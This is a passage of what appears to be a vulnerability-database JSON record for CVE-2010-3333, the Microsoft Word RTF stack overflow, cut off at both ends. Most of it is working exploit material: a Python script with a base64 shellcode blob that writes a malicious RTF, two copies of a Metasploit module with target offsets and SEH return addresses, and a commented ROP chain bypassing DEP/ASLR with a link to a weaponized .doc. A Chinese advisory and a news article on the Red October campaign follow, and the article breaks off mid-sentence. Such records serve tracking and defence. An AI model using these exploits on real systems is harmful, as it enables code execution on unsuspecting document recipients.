DE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxZWI3NzMxYzk2NDhiNzEzMDhiNzYwYzhiNzYxYzhiNWUwODhiN2UyMDhiMzY2NjM5NGYxODc1ZjJjMzYwOGI2YzI0MjQ4YjQ1M2M4YjU0MDU3ODAxZWE4YjRhMTg4YjVhMjAwMWViZTMzNDQ5OGIzNDhiMDFlZTMxZmYzMWMwZmNhYzg0YzA3NDA3YzFjZjBkMDFjN2ViZjQzYjdjMjQyODc1ZTE4YjVhMjQwMWViNjY4YjBjNGI4YjVhMWMwMWViOGIwNDhiMDFlODg5NDQyNDFjNjFjM2U4OTJmZmZmZmY1ZjgxZWY5OGZmZmZmZmViMDVlOGVkZmZmZmZmNjg4ZTRlMGVlYzUzZTg5NGZmZmZmZjMxYzk2NmI5NmY2ZTUxNjg3NTcyNmM2ZDU0ZmZkMDY4MzYxYTJmNzA1MGU4N2FmZmZmZmYzMWM5NTE1MThkMzc4MWM2ZWVmZmZmZmY4ZDU2MGM1MjU3NTFmZmQwNjg5OGZlOGEwZTUzZTg1YmZmZmZmZjQxNTE1NmZmZDA2ODdlZDhlMjczNTNlODRiZmZmZmZmZmZkMDYzNmQ2NDJlNjU3ODY1MjAyZjYzMjAyMDYxMmU2NTc4NjUwMA==\\n')\r\ntextfile = open(filename , 'w')\r\ntextfile.write(file.decode('base64')+binme+close)\r\ntextfile.close()\r\ntime.sleep(3)\r\nprint \"enjoy\"\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24526/"}, {"lastseen": "2016-02-02T06:16:03", "description": "Microsoft Word RTF pFragments Stack Buffer Overflow (File Format). CVE-2010-3333. Local exploit for windows platform", "published": "2011-03-04T00:00:00", "type": "exploitdb", "title": "Microsoft Word RTF pFragments Stack Buffer Overflow File Format", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2011-03-04T00:00:00", "id": "EDB-ID:16686", "href": "https://www.exploit-db.com/exploits/16686/", "sourceData": "##\r\n# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of the\r\n\t\t\t\t'pFragments' shape property within the Microsoft Word RTF parser. All versions\r\n\t\t\t\tof Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\r\n\t\t\t\tMS10-087 bulletin are vulnerable.\r\n\r\n\t\t\t\tThis module does not attempt to exploit the vulnerability via Microsoft Outlook.\r\n\r\n\t\t\t\tThe Microsoft Word RTF parser was only used by default in versions of Microsoft\r\n\t\t\t\tWord itself prior to Office 2007. With the release of Office 2007, Microsoft\r\n\t\t\t\tbegan using the Word RTF parser, by default, to handle rich-text messages within\r\n\t\t\t\tOutlook as well. It was possible to configure Outlook 2003 and earlier to use\r\n\t\t\t\tthe Microsoft Word engine too, but it was not a default setting.\r\n\r\n\t\t\t\tIt appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\r\n\t\t\t\tMicrosoft will confirm or deny this since Office 2000 has reached its support\r\n\t\t\t\tcycle end-of-life.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'wushi of team509', # original discovery\r\n\t\t\t\t\t'unknown', # exploit found in the wild\r\n\t\t\t\t\t'jduck', # Metasploit module\r\n\t\t\t\t\t'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 11875 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-3333' ],\r\n\t\t\t\t\t[ 'OSVDB', '69085' ],\r\n\t\t\t\t\t[ 'MSB', 'MS10-087' ],\r\n\t\t\t\t\t[ 'BID', '44652' ],\r\n\t\t\t\t\t[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true # no need\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# This automatic target will combine all targets into one file :)\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\r\n\t\t\t\t\t# Office v10.6854.6845, winword.exe v10.0.6854.0\r\n\t\t\t\t\t[ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 23532, 45944 ],\r\n\t\t\t\t\t\t\t#'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0\r\n\t\t\t\t\t\t\t'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# Office v11.8307.8324, winword.exe v11.0.8307.0\r\n\t\t\t\t\t# Office v11.8328.8221, winword.exe v11.0.8328.0\r\n\t\t\t\t\t[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 24580, 51156 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x30001bdd # p/p/r in winword.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.\r\n\r\n\t\t\t\t\t# Office v12.0.6425.1000, winword.exe v12.0.6425.1000\r\n\t\t\t\t\t[ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 5956 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 5956 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 5956 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\r\n\t\t\t\t\t# crash on a deref path to heaven.\r\n\t\t\t\t\t[ 'Crash Target for Debugging',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 65535 ],\r\n\t\t\t\t\t\t\t'Ret' => 0xdac0ffee\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 09 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef add_target(rest, targ)\r\n\t\ttarg['Offsets'].each { |off|\r\n\t\t\tseh = generate_seh_record(targ.ret)\r\n\t\t\trest[off, seh.length] = seh\r\n\t\t\tdistance = off + seh.length\r\n\t\t\tjmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\t\trest[off + seh.length, jmp_back.length] = jmp_back\r\n\t\t}\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Prepare a sample SEH frame and backward jmp for length calculations\r\n\t\tseh = generate_seh_record(0xdeadbeef)\r\n\t\tjmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-0xffff\").encode_string\r\n\r\n\t\t# RTF property Array parameters\r\n\t\tel_size = sz_rand()\r\n\t\tel_count = sz_rand()\r\n\r\n\t\tdata = ''\r\n\t\t# These words are presumably incorrectly used\r\n\t\t# assert(amount1 <= amount2)\r\n\t\tdata << [0x1111].pack('v') * 2\r\n\t\tdata << [0xc8ac].pack('v')\r\n\r\n\t\t# Filler\r\n\t\tif target.name =~ /Debug/i\r\n\t\t\trest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)\r\n\t\telse\r\n\t\t\tlen = 51200 + rand(1000)\r\n\t\t\trest = rand_text(len + seh.length + jmp_back.length)\r\n\t\t\trest[0, payload.encoded.length] = payload.encoded\r\n\t\tend\r\n\r\n\t\t# Stick fake SEH frames here and there ;)\r\n\t\tif target.name == \"Automatic\"\r\n\t\t\ttargets.each { |t|\r\n\t\t\t\tnext if t.name !~ /Windows/i\r\n\r\n\t\t\t\tadd_target(rest, t)\r\n\t\t\t}\r\n\t\telse\r\n\t\t\tadd_target(rest, target)\r\n\t\tend\r\n\r\n\t\t# Craft the array for the property value\r\n\t\tsploit = \"%d;%d;\" % [el_size, el_count]\r\n\t\tsploit << data.unpack('H*').first\r\n\t\tsploit << rest.unpack('H*').first\r\n\r\n\t\t# Assemble it all into a nice RTF\r\n\t\tcontent = \"{\\\\rtf1\"\r\n\t\tcontent << \"{\\\\shp\" # shape\r\n\t\tcontent << \"{\\\\sp\" # shape property\r\n\t\tcontent << \"{\\\\sn pFragments}\" # property name\r\n\t\tcontent << \"{\\\\sv #{sploit}}\" # property value\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(content)\r\n\r\n\tend\r\n\r\n\tdef sz_rand\r\n\t\tbad_sizes = [ 0, 2, 4, 8 ]\r\n\t\tx = rand(9)\r\n\t\twhile bad_sizes.include? x\r\n\t\t\tx = rand(9)\r\n\t\tend\r\n\t\tx\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16686/"}, {"lastseen": "2016-02-02T07:56:11", "description": "Microsoft Office 2010 - RTF Header Stack Overflow Vulnerability Exploit. CVE-2010-3333. Local exploit for windows platform", "published": "2011-07-03T00:00:00", "type": "exploitdb", "title": "Microsoft Office 2010 - RTF Header Stack Overflow Vulnerability Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2011-07-03T00:00:00", "id": "EDB-ID:17474", "href": "https://www.exploit-db.com/exploits/17474/", "sourceData": "# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability\r\nExploit\r\n# Date: 7/3/2011\r\n# Author: Snake ( Shahriyar.j < at > gmail )\r\n# Version: MS Office <= 2010\r\n# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7\r\n# CVE : CVE-2010-3333\r\n\r\n# This is the exploit I wrote for Abysssec \"The Arashi\" article.\r\n# It gracefully bypass DEP/ASLR in MS Office 2010,\r\n# and we named this method \"Ikazuchi DEP/ASRL Bypass\" : >\r\n# unfortunately msgr3en.dll loads a few seconds after opining office,\r\n# so just need to open open Office , and then open exploit after a few second and saw a nice calc.\r\n#\r\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\r\n# http://www.exploit-db.com/docs/17469.pdf\r\n#\r\n# me : twitter.com/ponez\r\n# aslo check here for Persian docs of this methods and more :\r\n# http://www.0days.ir/article/\r\n\r\n\r\n\r\n#\r\n# and the Rop :\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # HeapCreate() IAT = 3F10115C\r\n\r\n3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # EAX == HeapCreate() Address\r\n\r\n3F39AFCF CALL EAX\r\n RETN\r\n # Call HeapCreate() and Create a Executable Heap :D\r\n # after this call, EAX contain our Heap Address.\r\n\r\n0x3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x00008000 into ECX\r\n\r\n0x3F39CB46 ADD EAX,ECX\r\n POP ESI\r\n RETN\r\n # add ECX to EAX and instead of calling HeapAlloc,\r\n # now EAX point to the RWX Heap :D\r\n\r\n0x3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 into ECX, it is a writable address.\r\n\r\n0x3F2233CC MOV DWORD PTR DS:[ECX],EAX\r\n RETN\r\n # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for\r\nfurther use ;)\r\n\r\n0x3F2D59DF POP EAX\r\n ADD DWORD PTR DS:[EAX],ESP\r\n RETN\r\n # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\r\n # then we add ESP to the Zero which result in storing ESP into\r\nthat address,\r\n # we need ESP address for copying shellcode ( which stores in\r\nStack ),\r\n # and we have to get it dynamically at run-time, now with my\r\ntricky instruction, we have it!\r\n\r\n\r\n0x3F2F18CC POP EAX\r\n RETN\r\n # pop 0x3F3B3DC4 ( ESP address ) into EAX\r\n\r\n\r\n0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]\r\n RETN\r\n # now ECX point to nearly offset of Stack.\r\n\r\n0x3F39795E POP EDX\r\n RETN\r\n # pop 0x00000024 into EDX\r\n\r\n0x3F39CB44 ADD ECX,EDX\r\n ADD EAX,ECX\r\n POP ESI\r\n RETN\r\n # add 0x24 to ECX ( Stack address )\r\n\r\n0x3F398267 MOV EAX,ECX\r\n RETN\r\n # EAX = ECX ; )\r\n\r\n0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX\r\n XOR EAX,EAX\r\n POP ESI\r\n RETN\r\n # mov EAX ( Stack Address + 24 = Current ESP value ) into the\r\ncurrent Stack Location,\r\n # and the popping it into ESI ! now ESI point where shellcode\r\nstores in stack :D\r\n\r\n0x3F398267 MOV EAX,ECX\r\n RETN\r\n # EAX = ECX ; )\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n\r\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # now EAX point to our RWX Heap\r\n\r\n0x3F2B0A7C XCHG EAX,EDI\r\n RETN 4\r\n # EDI = Our RWX Heap Address\r\n\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n \r\n\r\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # now EAX point to our RWX Heap\r\n\r\n0x3F38BEFB ADD AL,58\r\n RETN\r\n # just skip some junks ; )\r\n\r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )\r\n\r\n3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]\r\n POP EDI\r\n POP ESI\r\n RETN\r\n # Copy shellcode from stack into RWX Heap\r\n\r\n\r\n3F39AFCF CALL EAX\r\n RETN\r\n # KABOOM !!!\r\n\r\n\r\n\r\n\r\n\r\nExploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17474/"}], "seebug": [{"lastseen": "2017-11-19T18:07:08", "description": "BUGTRAQ ID: 44652\r\nCVE ID: CVE-2010-3333\r\n\r\nWord\u662f\u5fae\u8f6fOffice\u5957\u4ef6\u4e2d\u7684\u6587\u5b57\u5904\u7406\u5de5\u5177\u3002\r\n\r\n\u5728\u5904\u7406RTF\u6587\u6863\u4e2d\u7684\u7279\u5b9a\u63a7\u5236\u5b57\u65f6Word\u672a\u7ecf\u6267\u884c\u957f\u5ea6\u68c0\u67e5\u4fbf\u5c06\u5176\u5c5e\u6027\u5b57\u7b26\u4e32\u62f7\u8d1d\u5230\u4e86\u6808\u7f13\u51b2\u533a\u4e2d\uff0c\u8fd9\u53ef\u80fd\u89e6\u53d1\u6808\u6ea2\u51fa\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\r\n\r\nMicrosoft Office XP SP3\r\nMicrosoft Office for Mac 2011\r\nMicrosoft Office 2010\r\nMicrosoft Office 2008 for Mac\r\nMicrosoft Office 2007 SP2\r\nMicrosoft Office 2004 for Mac\r\nMicrosoft Office 2003 Service Pack 3\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4e0d\u8981\u6253\u5f00\u6216\u4fdd\u5b58\u4ece\u4e0d\u53d7\u4fe1\u4efb\u6765\u6e90\u6216\u4ece\u53d7\u4fe1\u4efb\u6765\u6e90\u610f\u5916\u6536\u5230\u7684Microsoft Office\u6587\u4ef6\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-087\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-087\uff1aVulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-087.mspx?pf=true", "published": "2010-11-17T00:00:00", "type": "seebug", "title": "Microsoft Word RTF\u6587\u4ef6\u89e3\u6790\u6808\u6ea2\u51fa\u6f0f\u6d1e(MS10-087)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2010-11-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20246", "id": "SSV:20246", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-06-27T20:07:27", "description": "This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that Microsoft will confirm or deny this since Office 2000 has reached its support cycle end-of-life.\n", "published": "2010-12-29T20:30:50", "type": "metasploit", "title": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS10_087_RTF_PFRAGMENTS_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'wushi of team509', # original discovery\n 'unknown', # exploit found in the wild\n 'jduck', # Metasploit module\n 'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz\n ],\n 'References' =>\n [\n [ 'CVE', '2010-3333' ],\n [ 'OSVDB', '69085' ],\n [ 'MSB', 'MS10-087' ],\n [ 'BID', '44652' ],\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true # no need\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # This automatic target will combine all targets into one file :)\n [ 'Automatic', { } ],\n\n # Office v10.6854.6845, winword.exe v10.0.6854.0\n [ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',\n {\n 'Offsets' => [ 23532, 45944 ],\n #'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0\n 'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0\n }\n ],\n\n # Office v11.8307.8324, winword.exe v11.0.8307.0\n # Office v11.8328.8221, winword.exe v11.0.8328.0\n [ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',\n {\n 'Offsets' => [ 24580, 51156 ],\n 'Ret' => 0x30001bdd # p/p/r in winword.exe\n }\n ],\n\n # In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.\n\n # Office v12.0.6425.1000, winword.exe v12.0.6425.1000\n [ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',\n {\n 'Offsets' => [ 5956 ],\n 'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record\n }\n ],\n\n [ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',\n {\n 'Offsets' => [ 5956 ],\n 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.\n }\n ],\n\n [ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',\n {\n 'Offsets' => [ 5956 ],\n 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.\n }\n ],\n\n\n # crash on a deref path to heaven.\n [ 'Crash Target for Debugging',\n {\n 'Offsets' => [ 65535 ],\n 'Ret' => 0xdac0ffee\n }\n ]\n ],\n 'DisclosureDate' => 'Nov 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),\n ])\n end\n\n def add_target(rest, targ)\n targ['Offsets'].each { |off|\n seh = generate_seh_record(targ.ret)\n rest[off, seh.length] = seh\n distance = off + seh.length\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n rest[off + seh.length, jmp_back.length] = jmp_back\n }\n end\n\n def exploit\n\n # Prepare a sample SEH frame and backward jmp for length calculations\n seh = generate_seh_record(0xdeadbeef)\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-0xffff\").encode_string\n\n # RTF property Array parameters\n el_size = sz_rand()\n el_count = sz_rand()\n\n data = ''\n # These words are presumably incorrectly used\n # assert(amount1 <= amount2)\n data << [0x1111].pack('v') * 2\n data << [0xc8ac].pack('v')\n\n # Filler\n if target.name =~ /Debug/i\n rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)\n else\n len = 51200 + rand(1000)\n rest = rand_text(len + seh.length + jmp_back.length)\n rest[0, payload.encoded.length] = payload.encoded\n end\n\n # Stick fake SEH frames here and there ;)\n if target.name == \"Automatic\"\n targets.each { |t|\n next if t.name !~ /Windows/i\n\n add_target(rest, t)\n }\n else\n add_target(rest, target)\n end\n\n # Craft the array for the property value\n sploit = \"%d;%d;\" % [el_size, el_count]\n sploit << data.unpack('H*').first\n sploit << rest.unpack('H*').first\n\n # Assemble it all into a nice RTF\n content = \"{\\\\rtf1\"\n content << \"{\\\\shp\" # shape\n content << \"{\\\\sp\" # shape property\n content << \"{\\\\sn pFragments}\" # property name\n content << \"{\\\\sv #{sploit}}\" # property value\n content << \"}\"\n content << \"}\"\n content << \"}\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(content)\n\n end\n\n def sz_rand\n bad_sizes = [ 0, 2, 4, 8 ]\n x = rand(9)\n while bad_sizes.include? x\n x = rand(9)\n end\n x\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb"}], "thn": [{"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2009-3129"], "description": "A new sensational discovered has been announced by Kaspersky Lab\u2019s Global Research & Analysis Team result of an investigation after several attacks hit computer networks of various international diplomatic service agencies.\n\n[](<http://3.bp.blogspot.com/-oLHA29NAIM8/UPUy7lMIn9I/AAAAAAAAAI4/5CzgGdxDSeU/s1600/Red+October+Operation.png>)\n\nA new large scale [cyber-espionage](<http://securityaffairs.co/wordpress/11405/intelligence/cyberespionage-another-watering-hole-attack-against-us-website.html>) operation has been discovered, named **Red October**, name inspired by famous novel **The Hunt For The Red October (ROCRA)** and chosen because the investigation started last October.\n\n \n\n\nThe campaign hit hundreds of machines belonging to following categories:\n\n * Government\n * Diplomatic / embassies\n * Research institutions\n * Trade and commerce\n * Nuclear / energy research\n * Oil and gas companies\n * Aerospace\n * Military\n\nThe attackers have targeted various devices such as enterprise network equipment and mobile devices (Windows Mobile, iPhone, Nokia), hijacking files from removable disk drives, stealing e-mail databases from local Outlook storage or remote POP/IMAP server and siphoning files from local network FTP servers.\n\n \n \n\n\nAccording security experts involved in the investigation the cyber-espionage campaign was started since 2007 and is still active, during this long period the attackers obtained a huge quantity of information such as service credentials that hav been reused in later attacks.\n\n \n\n\nThe control structure discovered is very complex and extended, more than 60 domain names and several server hosting located in many countries mainly Germany and Russia. A particularity of the C&C architecture is that the network is arranged to hide the mothership-server true proxy functionality of every node in the malicious structure.\n\n \n\n\nSecurity experts were able to sinkhole six of the 60 domains used during the period 2 Nov 2012 - 10 Jan 2013, registering over 55,000 connections to the sinkhole from 250 different victim\u2019s IPs from 39 different countries, with most of IPs being from Switzerland. Kazakhstan and Greece follow next.\n\n[](<http://3.bp.blogspot.com/-2eJDE126xVU/UPUzWdD6aII/AAAAAAAAAJA/bK4zpvEs7WA/s1600/Red+October+Operation.png>)\n\n**Red October Geo-distribution of victims**\n\nWhich are the vulnerabilities exploited for the attacks?\n\nThe security expert discovered that at least three different known vulnerabilities have been exploited\n\n * CVE-2009-3129 (MS Excel) [attacks dated 2010 and 21011]\n * CVE-2010-3333 (MS Word) [attacks conducted in the summer of 2012]\n * CVE-2012-0158 (MS Word) [attacks conducted in the summer of 2012]\n\nEvidences collected during the investigation let security specialists to believe that attackers have Russian origins, but strangely they appear unrelated to any other cyber attacks detected until now. The exploits appear to have been created by Chinese hackers.\n\n \n\n\n**Attack Method**\n\nThese attacks is structured in two distinct phases according a classic schema of targeted attacks:\n\n 1. Initial infection\n 2. Additional modules deployed for intelligence gathering\n\nIn the initial phase the malware is delivered via e-mail as attachments (Microsoft Excel, Word and, probably PDF documents), once victims opened the malicious document the embedded malicious code initiated the setup of the main component which in turn handled further communication with the C&C servers, after the malware receives from the C&C server a number of additional spy modules. \n \n\n\nThe way to infect entire network is very efficient, the hackers used a module to scan target infrastructure searching for vulnerable machines. The attacks against each machine and related services is made exploiting the above vulnerabilities or gaining access to it using credentials collected during other attacks of the same campaign. The exploits appear to have been created by Chinese hackers. \n \n\n\nWhat alarms me is that such campaigns could be going on for years with disastrous consequences ... _what to do at this point? How is it possible that an operation so extended escape for so long to world wide security community? Who is behind the attacks? Cyber criminals or state-sponsored hackers?_\n\n \n\n\n**UPDATE 2013/01/15**\n\nJeffrey Carr, founder and CEO of Taia Global, Inc, posted on 